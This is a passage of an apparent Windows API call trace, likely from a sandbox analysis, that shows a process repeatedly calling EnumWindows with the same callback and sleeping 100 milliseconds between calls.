(lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.696] Sleep (dwMilliseconds=0x64) [0128.697] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.697] Sleep (dwMilliseconds=0x64) [0128.699] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.699] Sleep (dwMilliseconds=0x64) [0128.701] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.701] Sleep (dwMilliseconds=0x64) [0128.705] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.705] Sleep (dwMilliseconds=0x64) [0128.706] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.706] Sleep (dwMilliseconds=0x64) [0128.708] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.708] Sleep (dwMilliseconds=0x64) [0128.710] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.710] Sleep (dwMilliseconds=0x64) [0128.711] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.712] Sleep (dwMilliseconds=0x64) [0128.713] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.713] Sleep (dwMilliseconds=0x64) [0128.715] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.715] Sleep (dwMilliseconds=0x64) [0128.716] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.716] Sleep (dwMilliseconds=0x64) [0128.718] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.718] Sleep (dwMilliseconds=0x64) [0128.720] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.720] Sleep (dwMilliseconds=0x64) [0128.722] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.722] Sleep (dwMilliseconds=0x64) [0128.723] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.723] Sleep (dwMilliseconds=0x64) [0128.725] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.725] Sleep (dwMilliseconds=0x64) [0128.727] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.727] Sleep (dwMilliseconds=0x64) [0128.728] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.729] Sleep (dwMilliseconds=0x64) [0128.730] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.731] Sleep (dwMilliseconds=0x64) [0128.732] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.732] Sleep (dwMilliseconds=0x64) [0128.734] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.734] Sleep (dwMilliseconds=0x64) [0128.735] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.736] Sleep (dwMilliseconds=0x64) [0128.737] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.737] Sleep (dwMilliseconds=0x64) [0128.739] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.739] Sleep (dwMilliseconds=0x64) [0128.741] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.741] Sleep (dwMilliseconds=0x64) [0128.743] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.743] Sleep (dwMilliseconds=0x64) [0128.745] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.745] Sleep (dwMilliseconds=0x64) [0128.746] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.746] Sleep (dwMilliseconds=0x64) [0128.750] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.750] Sleep (dwMilliseconds=0x64) [0128.755] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.755] Sleep (dwMilliseconds=0x64) [0128.757] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.758] Sleep (dwMilliseconds=0x64) [0128.760] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.760] Sleep (dwMilliseconds=0x64) [0128.763] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.763] Sleep (dwMilliseconds=0x64) [0128.765] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.765] Sleep (dwMilliseconds=0x64) [0128.767] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.767] Sleep (dwMilliseconds=0x64) [0128.769] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.769] Sleep (dwMilliseconds=0x64) [0128.770] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.771] Sleep (dwMilliseconds=0x64) [0128.772] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.773] Sleep (dwMilliseconds=0x64) [0128.774] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.774] Sleep (dwMilliseconds=0x64) [0128.776] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.776] Sleep (dwMilliseconds=0x64) [0128.777] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.778] Sleep (dwMilliseconds=0x64) [0128.779] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.779] Sleep (dwMilliseconds=0x64) [0128.781] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.781] Sleep (dwMilliseconds=0x64) [0128.783] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.783] Sleep (dwMilliseconds=0x64) [0128.785] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.785] Sleep (dwMilliseconds=0x64) [0128.787] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.787] Sleep (dwMilliseconds=0x64) [0128.788] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.789] Sleep (dwMilliseconds=0x64) [0128.791] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.791] Sleep (dwMilliseconds=0x64) [0128.793] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.793] Sleep (dwMilliseconds=0x64) [0128.794] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.795] Sleep (dwMilliseconds=0x64) [0128.796] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.797] Sleep (dwMilliseconds=0x64) [0128.798] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.799] Sleep (dwMilliseconds=0x64) [0128.800] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.800] Sleep (dwMilliseconds=0x64) [0128.802] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.802] Sleep (dwMilliseconds=0x64) [0128.803] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.804] Sleep (dwMilliseconds=0x64) [0128.805] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.805] Sleep (dwMilliseconds=0x64) [0128.806] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.807] Sleep (dwMilliseconds=0x64) [0128.808] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.808] Sleep (dwMilliseconds=0x64) [0128.809] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.810] Sleep (dwMilliseconds=0x64) [0128.812] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.813] Sleep (dwMilliseconds=0x64) [0128.815] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.815] Sleep (dwMilliseconds=0x64) [0128.817] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.817] Sleep (dwMilliseconds=0x64) [0128.819] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.819] Sleep (dwMilliseconds=0x64) [0128.821] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.822] Sleep (dwMilliseconds=0x64) [0128.824] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.824] Sleep (dwMilliseconds=0x64) [0128.825] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.826] Sleep (dwMilliseconds=0x64) [0128.827] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.827] Sleep (dwMilliseconds=0x64) [0128.829] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.829] Sleep (dwMilliseconds=0x64) [0128.831] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.831] Sleep (dwMilliseconds=0x64) [0128.834] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.834] Sleep (dwMilliseconds=0x64) [0128.836] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.836] Sleep (dwMilliseconds=0x64) [0128.838] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.838] Sleep (dwMilliseconds=0x64) [0128.839] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.840] Sleep (dwMilliseconds=0x64) [0128.842] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.842] Sleep (dwMilliseconds=0x64) [0128.844] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.845] Sleep (dwMilliseconds=0x64) [0128.846] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.847] Sleep (dwMilliseconds=0x64) [0128.848] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.848] Sleep (dwMilliseconds=0x64) [0128.850] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.851] Sleep (dwMilliseconds=0x64) [0128.852] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.852] Sleep (dwMilliseconds=0x64) [0128.854] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.854] Sleep (dwMilliseconds=0x64) [0128.855] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.856] Sleep (dwMilliseconds=0x64) [0128.858] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.858] Sleep (dwMilliseconds=0x64) [0128.860] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.860] Sleep (dwMilliseconds=0x64) [0128.862] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.862] Sleep (dwMilliseconds=0x64) [0128.863] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.864] Sleep (dwMilliseconds=0x64) [0128.865] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.865] Sleep (dwMilliseconds=0x64) [0128.866] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.867] Sleep (dwMilliseconds=0x64) [0128.869] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.869] Sleep (dwMilliseconds=0x64) [0128.870] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.871] Sleep (dwMilliseconds=0x64) [0128.872] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.872] Sleep (dwMilliseconds=0x64) [0128.874] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.874] Sleep (dwMilliseconds=0x64) [0128.875] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.875] Sleep (dwMilliseconds=0x64) [0128.876] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.877] Sleep (dwMilliseconds=0x64) [0128.879] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.879] Sleep (dwMilliseconds=0x64) [0128.880] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.881] Sleep (dwMilliseconds=0x64) [0128.882] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.882] Sleep (dwMilliseconds=0x64) [0128.883] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.884] Sleep (dwMilliseconds=0x64) [0128.885] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.885] Sleep (dwMilliseconds=0x64) [0128.887] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.887] Sleep (dwMilliseconds=0x64) [0128.888] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.888] Sleep (dwMilliseconds=0x64) [0128.891] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.891] Sleep (dwMilliseconds=0x64) [0128.893] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.893] Sleep (dwMilliseconds=0x64) [0128.895] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.895] Sleep (dwMilliseconds=0x64) [0128.897] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.897] Sleep (dwMilliseconds=0x64) [0128.899] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.899] Sleep (dwMilliseconds=0x64) [0128.901] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.901] Sleep (dwMilliseconds=0x64) [0128.903] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.904] Sleep (dwMilliseconds=0x64) [0128.905] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.906] Sleep (dwMilliseconds=0x64) [0128.908] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.908] Sleep (dwMilliseconds=0x64) [0128.910] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.910] Sleep (dwMilliseconds=0x64) [0128.911] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.912] Sleep (dwMilliseconds=0x64) [0128.913] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.914] Sleep (dwMilliseconds=0x64) [0128.915] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.916] Sleep (dwMilliseconds=0x64) [0128.918] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.918] Sleep (dwMilliseconds=0x64) [0128.920] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.920] Sleep (dwMilliseconds=0x64) [0128.922] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.922] Sleep (dwMilliseconds=0x64) [0128.923] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.924] Sleep (dwMilliseconds=0x64) [0128.925] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.925] Sleep (dwMilliseconds=0x64) [0128.927] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.927] Sleep (dwMilliseconds=0x64) [0128.929] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.929] Sleep (dwMilliseconds=0x64) [0128.930] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.930] Sleep (dwMilliseconds=0x64) [0128.932] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.933] Sleep (dwMilliseconds=0x64) [0128.950] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.950] Sleep (dwMilliseconds=0x64) [0128.952] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.952] Sleep (dwMilliseconds=0x64) [0128.955] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.955] Sleep (dwMilliseconds=0x64) [0128.957] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.957] Sleep (dwMilliseconds=0x64) [0128.958] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.958] Sleep (dwMilliseconds=0x64) [0128.960] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.960] Sleep (dwMilliseconds=0x64) [0128.961] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.962] Sleep (dwMilliseconds=0x64) [0128.963] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.963] Sleep (dwMilliseconds=0x64) [0128.965] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.966] Sleep (dwMilliseconds=0x64) [0128.968] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.968] Sleep (dwMilliseconds=0x64) [0128.969] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.969] Sleep (dwMilliseconds=0x64) [0128.971] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.971] Sleep (dwMilliseconds=0x64) [0128.972] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.972] Sleep (dwMilliseconds=0x64) [0128.974] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.974] Sleep (dwMilliseconds=0x64) [0128.975] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.976] Sleep (dwMilliseconds=0x64) [0128.977] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.977] Sleep (dwMilliseconds=0x64) [0128.979] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.979] Sleep (dwMilliseconds=0x64) [0128.981] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.981] Sleep (dwMilliseconds=0x64) [0128.982] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.982] Sleep (dwMilliseconds=0x64) [0128.986] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.986] Sleep (dwMilliseconds=0x64) [0128.988] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.988] Sleep (dwMilliseconds=0x64) [0128.989] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.989] Sleep (dwMilliseconds=0x64) [0128.991] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.991] Sleep (dwMilliseconds=0x64) [0128.992] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.992] Sleep (dwMilliseconds=0x64) [0128.994] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.994] Sleep (dwMilliseconds=0x64) [0128.995] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.995] Sleep (dwMilliseconds=0x64) [0128.997] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.997] Sleep (dwMilliseconds=0x64) [0128.999] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.999] Sleep (dwMilliseconds=0x64) [0129.001] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.001] Sleep (dwMilliseconds=0x64) [0129.004] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.004] Sleep (dwMilliseconds=0x64) [0129.006] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.006] Sleep (dwMilliseconds=0x64) [0129.008] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.008] Sleep (dwMilliseconds=0x64) [0129.009] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.010] Sleep (dwMilliseconds=0x64) [0129.011] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.011] Sleep (dwMilliseconds=0x64) [0129.013] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.013] Sleep (dwMilliseconds=0x64) [0129.015] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.015] Sleep (dwMilliseconds=0x64) [0129.016] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.016] Sleep (dwMilliseconds=0x64) [0129.018] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.018] Sleep (dwMilliseconds=0x64) [0129.019] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.019] Sleep (dwMilliseconds=0x64) [0129.021] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.021] Sleep (dwMilliseconds=0x64) [0129.023] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.023] Sleep (dwMilliseconds=0x64) [0129.025] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.025] Sleep (dwMilliseconds=0x64) [0129.027] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.027] Sleep (dwMilliseconds=0x64) [0129.028] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.028] Sleep (dwMilliseconds=0x64) [0129.030] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.030] Sleep (dwMilliseconds=0x64) [0129.031] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.031] Sleep (dwMilliseconds=0x64) [0129.033] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.033] Sleep (dwMilliseconds=0x64) [0129.034] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.034] Sleep (dwMilliseconds=0x64) [0129.036] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.036] Sleep (dwMilliseconds=0x64) [0129.037] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.037] Sleep (dwMilliseconds=0x64) [0129.039] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.039] Sleep (dwMilliseconds=0x64) [0129.040] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.040] Sleep (dwMilliseconds=0x64) [0129.042] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.042] Sleep (dwMilliseconds=0x64) [0129.044] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.045] Sleep (dwMilliseconds=0x64) [0129.046] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.046] Sleep (dwMilliseconds=0x64) [0129.048] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.048] Sleep (dwMilliseconds=0x64) [0129.049] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.049] Sleep (dwMilliseconds=0x64) [0129.051] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.051] Sleep (dwMilliseconds=0x64) [0129.052] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.053] Sleep (dwMilliseconds=0x64) [0129.054] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.055] Sleep (dwMilliseconds=0x64) [0129.056] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.057] Sleep (dwMilliseconds=0x64) [0129.058] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.058] Sleep (dwMilliseconds=0x64) [0129.060] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.060] Sleep (dwMilliseconds=0x64) [0129.061] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.061] Sleep (dwMilliseconds=0x64) [0129.063] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.063] Sleep (dwMilliseconds=0x64) [0129.065] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.065] Sleep (dwMilliseconds=0x64) [0129.067] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.067] Sleep (dwMilliseconds=0x64) [0129.069] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.069] Sleep (dwMilliseconds=0x64) [0129.070] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.070] Sleep (dwMilliseconds=0x64) [0129.072] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.072] Sleep (dwMilliseconds=0x64) [0129.073] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.073] Sleep (dwMilliseconds=0x64) [0129.075] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.075] Sleep (dwMilliseconds=0x64) [0129.076] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.076] Sleep (dwMilliseconds=0x64) [0129.078] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.078] Sleep (dwMilliseconds=0x64) [0129.079] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.079] Sleep (dwMilliseconds=0x64) [0129.081] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.081] Sleep (dwMilliseconds=0x64) [0129.082] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.082] Sleep (dwMilliseconds=0x64) [0129.084] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.084] Sleep (dwMilliseconds=0x64) [0129.085] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.085] Sleep (dwMilliseconds=0x64) [0129.087] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.087] Sleep (dwMilliseconds=0x64) [0129.090] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.091] Sleep (dwMilliseconds=0x64) [0129.092] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.092] Sleep (dwMilliseconds=0x64) [0129.094] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.094] Sleep (dwMilliseconds=0x64) [0129.096] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.096] Sleep (dwMilliseconds=0x64) [0129.097] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.098] Sleep (dwMilliseconds=0x64) [0129.099] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.099] Sleep (dwMilliseconds=0x64) [0129.101] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.101] Sleep (dwMilliseconds=0x64) [0129.103] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.103] Sleep (dwMilliseconds=0x64) [0129.104] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.104] Sleep (dwMilliseconds=0x64) [0129.106] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.106] Sleep (dwMilliseconds=0x64) [0129.108] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.108] Sleep (dwMilliseconds=0x64) [0129.110] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.110] Sleep (dwMilliseconds=0x64) [0129.113] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.113] Sleep (dwMilliseconds=0x64) [0129.115] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.115] Sleep (dwMilliseconds=0x64) [0129.116] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.117] Sleep (dwMilliseconds=0x64) [0129.118] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.118] Sleep (dwMilliseconds=0x64) [0129.120] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.120] Sleep (dwMilliseconds=0x64) [0129.122] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.122] Sleep (dwMilliseconds=0x64) [0129.124] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.124] Sleep (dwMilliseconds=0x64) [0129.125] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.125] Sleep (dwMilliseconds=0x64) [0129.127] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.127] Sleep (dwMilliseconds=0x64) [0129.129] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.129] Sleep (dwMilliseconds=0x64) [0129.130] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.131] Sleep (dwMilliseconds=0x64) [0129.132] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.132] Sleep (dwMilliseconds=0x64) [0129.134] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.134] Sleep (dwMilliseconds=0x64) [0129.135] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.136] Sleep (dwMilliseconds=0x64) [0129.140] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.140] Sleep (dwMilliseconds=0x64) [0129.142] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.142] Sleep (dwMilliseconds=0x64) [0129.143] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.144] Sleep (dwMilliseconds=0x64) [0129.146] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.146] Sleep (dwMilliseconds=0x64) [0129.147] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.148] Sleep (dwMilliseconds=0x64) [0129.149] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.149] Sleep (dwMilliseconds=0x64) [0129.150] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.151] Sleep (dwMilliseconds=0x64) [0129.152] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.152] Sleep (dwMilliseconds=0x64) [0129.154] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.154] Sleep (dwMilliseconds=0x64) [0129.155] EnumWindows 